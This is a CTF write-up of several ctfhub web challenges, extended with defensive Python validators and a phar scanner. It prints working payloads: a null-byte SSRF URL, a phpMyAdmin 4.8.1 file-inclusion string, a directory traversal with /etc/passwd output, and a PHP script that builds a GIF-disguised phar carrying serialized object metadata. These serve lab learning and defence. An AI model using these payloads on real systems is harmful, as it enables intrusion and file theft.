Challenge hints
CVE-2020-7066
Hint: Flag in localhost
Tips: Host must end with '123'
You just view *.ctfhub.com
Underlying bug
PHP bug #79329: get_headers() silently truncates after a null byte
This was tested on PHP 7.3, but the function has always had this bug.
The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.
Solution
?url=http://127.0.0.123%00.ctfhub.com
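The reason that payload works, shown from the defender's side as an added Python example (not part of the original writeup): a suffix check on the parsed host accepts the URL because the NUL is just another character to the script, while a NUL-terminated C string consumer such as the one in bug #79329 stops reading at the NUL and only ever sees 127.0.0.123. The hardened validator rejects control bytes before any parsing. The allowed suffix is taken from the challenge hint; the URLs are constructed inputs.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_SUFFIX = ".ctfhub.com"   # from the challenge hint

# Constructed inputs: the writeup's payload and a benign URL
PAYLOAD = "http://127.0.0.123%00.ctfhub.com"
BENIGN = "http://www.ctfhub.com/"


def suffix_check_only(url: str) -> bool:
    """The kind of check the challenge expects you to bypass: decode the
    parameter, parse it, test the host suffix. The NUL byte survives parsing,
    so the host string still ends with the allowed suffix and the check passes."""
    host = urlsplit(unquote(url)).hostname or ""
    return host.endswith(ALLOWED_SUFFIX)


def host_seen_by_c_string(url: str) -> str:
    """What a NUL-terminated C string consumer sees: everything after the
    first NUL is gone, so the request goes to the truncated host."""
    truncated = unquote(url).split("\x00", 1)[0]
    return urlsplit(truncated).hostname or ""


def is_safe_url(url: str) -> bool:
    """Hardened validator: refuse any control byte outright (before parsing),
    require http(s), refuse embedded credentials, and require the allowed
    suffix on a label boundary. Resolving the name and checking the resulting
    address against loopback/private ranges is a separate, later step."""
    decoded = unquote(url)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname or ""
    # ALLOWED_SUFFIX starts with '.', so endswith() already enforces the label boundary
    return host.endswith(ALLOWED_SUFFIX)


if __name__ == "__main__":
    print("suffix check passes:", suffix_check_only(PAYLOAD))
    print("host after NUL truncation:", host_seen_by_c_string(PAYLOAD))
    print("hardened check:", is_safe_url(PAYLOAD), is_safe_url(BENIGN))
```

The order of checks matters: the control-byte test runs on the decoded string before the URL parser touches it, so no later component can be handed a string that it interprets differently from the validator.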
Information gathering
Make good use of the PHP bug tracker when searching for vulnerabilities.
Solution
Scanning reveals /phpmyadmin/; visiting it shows the version is 4.8.1.
phpMyAdmin 4.8.1 has a file inclusion vulnerability; construct ?target=db_datadict.php%253f/../../../../../../../../../flag
Testing the upload shows that only image-type files are accepted.
Capture the request
POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png
After forwarding the request, the file contents are displayed.
Directory traversal
filename=../../../../../etc/passwd
Result
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
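The traversal above works because download.php joins the filename parameter onto a directory without validating it. As an added Python example (not code from the original challenge), the first function models that behaviour and the second shows the resolver a hardened download handler would use; the upload directory /var/www/uploads is an assumption, since the challenge does not reveal it, and the inputs are the writeup's own parameter values.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_DIR = "/var/www/uploads"   # assumed; the challenge does not reveal the real path


def concatenating_handler(filename_param: str) -> str:
    """Models what download.php evidently does: decode the parameter and
    glue it onto the upload directory. '..' segments walk out of the tree."""
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, unquote(filename_param)))


def safe_download_path(filename_param: str):
    """Hardened resolver: returns the absolute path to serve, or None.
    Only a bare file name is acceptable; separators, traversal segments and
    NUL bytes are rejected, and the resolved path is re-checked against the
    upload root as defence in depth."""
    name = unquote(filename_param)
    if not name or "\x00" in name:
        return None
    if "/" in name or "\\" in name or name in (".", ".."):
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    if posixpath.commonpath([UPLOAD_DIR, candidate]) != UPLOAD_DIR:
        return None
    return candidate


if __name__ == "__main__":
    print(concatenating_handler("../../../../../etc/passwd"))
    print(safe_download_path("../../../../../etc/passwd"))
    print(safe_download_path("%E5%9B%BE%E7%89%87%E9%A9%AC.png"))
```

Note that the resolver decodes the parameter exactly once and then refuses anything that still contains a separator; a second decoding pass (the trick the phpMyAdmin %253f payload relies on) would reopen the hole.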
Main files in the challenge
.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php
class.php is the core file.
class.php (simplified):
<?php
class User {
    public $db;
    public function __destruct() {
        $this->db->close();   // calls close() on whatever object $db holds
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
    public function __destruct() {
        ...
        echo $table;
    }
}

class File {
    public $filename;
    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
    public function close() {
        return file_get_contents($this->filename);   // reads the file named by $filename
    }
}
?>
The close() method of the File class is where the RCE vulnerability lies: it calls file_get_contents() on $this->filename.
Q: How is the RCE vulnerability reached?
The code never calls unserialize(), but there is a file upload point, which is where phar comes in.
A phar file has four parts (the labels follow the comments in the generator script below):
stub: the phar's identifier. Its format is xxx<?php xxx; __HALT_COMPILER();?>. The content in front is unrestricted, but it must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize the file as a phar.
manifest: a phar file is essentially a compressed archive, and this section holds the permissions, attributes and other information of each archived file. It also stores user-defined meta-data in serialized form, which is the core of this attack.
contents: the data of the archived files.
signature: only present in the phar file format.
Construct a phar file according to this structure; PHP has a built-in Phar class for the related operations.
Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.
<?php
// Generator script; run with phar.readonly=Off (e.g. php -d phar.readonly=0 gen.php)
class File {
    public $filename;   // mirrors the File class from class.php above
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // suffix must be phar
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
$o = new File();
$o->output = "phpinfo();";      // dynamic property; class.php's File declares only $filename
$phar->setMetadata($o);         // store custom meta-data (the serialized object) in the manifest
$phar->addFromString("test.txt", "test"); // compressed file
$phar->stopBuffering();         // automatic computation of signature
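As an added defensive counterpart (not part of the original writeup or the challenge), the following Python scanner parses the phar layout described above: it locates the stub by the __HALT_COMPILER token, walks the manifest header to the serialized meta-data, and flags a serialized object there. The manifest field layout used is the little-endian one PHP documents for the phar format; the sample bytes are constructed for the test and mirror the object the generator above stores with setMetadata(), and they deliberately omit file entries and the signature, so they are not a loadable phar.

```python
import re
import struct

# The phar extension locates the stub by this token; match case-insensitively to stay conservative.
HALT_TOKEN = re.compile(rb"__HALT_COMPILER\s*\(\s*\)\s*;", re.IGNORECASE)
# A serialized PHP object looks like O:<len>:"<class>":<count>:{
SERIALIZED_OBJECT = re.compile(rb'\bO:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')


def stub_end(data: bytes):
    """Offset just past the stub (the '?>' after __HALT_COMPILER(); plus an
    optional CRLF/LF), or None if the blob carries no stub at all."""
    m = HALT_TOKEN.search(data)
    if m is None:
        return None
    close = data.find(b"?>", m.end())
    if close < 0:
        return None
    end = close + 2
    if data[end:end + 2] == b"\r\n":
        end += 2
    elif data[end:end + 1] == b"\n":
        end += 1
    return end


def manifest_metadata(data: bytes):
    """Pull the serialized meta-data out of the manifest header. Layout
    (little-endian): manifest length, file count, API version (2 bytes),
    flags, alias length, alias, meta-data length, meta-data."""
    off = stub_end(data)
    if off is None or len(data) < off + 18:
        return None
    _mlen, _nfiles, _api, _flags, alias_len = struct.unpack_from("<IIHII", data, off)
    off += 18 + alias_len
    if len(data) < off + 4:
        return None
    meta_len = struct.unpack_from("<I", data, off)[0]
    off += 4
    if len(data) < off + meta_len:
        return None
    return data[off:off + meta_len]


def scan_upload(data: bytes) -> dict:
    """Verdict for an uploaded blob: does it carry a phar stub, and does the
    manifest meta-data hold a serialized object (the deserialization trigger)?"""
    meta = manifest_metadata(data)
    return {
        "is_phar": stub_end(data) is not None,
        "metadata": meta,
        "serialized_object": bool(meta and SERIALIZED_OBJECT.search(meta)),
    }


def constructed_sample(meta: bytes) -> bytes:
    """Test fixture only: a GIF-disguised stub followed by a manifest header
    carrying `meta`. File entries and the signature are omitted, so this is
    just enough bytes to exercise the parser, not a loadable phar."""
    stub = b"GIF89a<?php __HALT_COMPILER(); ?>\r\n"
    body = struct.pack("<IHII", 1, 0x1100, 0, 0) + struct.pack("<I", len(meta)) + meta
    return stub + struct.pack("<I", len(body)) + body


# Constructed: the object the generator above stores via setMetadata()
SAMPLE_META = b'O:4:"File":1:{s:6:"output";s:10:"phpinfo();";}'
# Constructed: a genuine (tiny) GIF with no stub
PLAIN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;"

if __name__ == "__main__":
    print(scan_upload(constructed_sample(SAMPLE_META)))
    print(scan_upload(PLAIN_GIF))
```

Checking the image's magic bytes alone would pass the disguised file, which is exactly why the stub search is done over the whole blob. On the PHP side, an application that never needs phar archives can additionally call stream_wrapper_unregister('phar') so that a phar:// path is never parsed at all.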
Original post: https://www.cnblogs.com/0d4y/p/13414897.html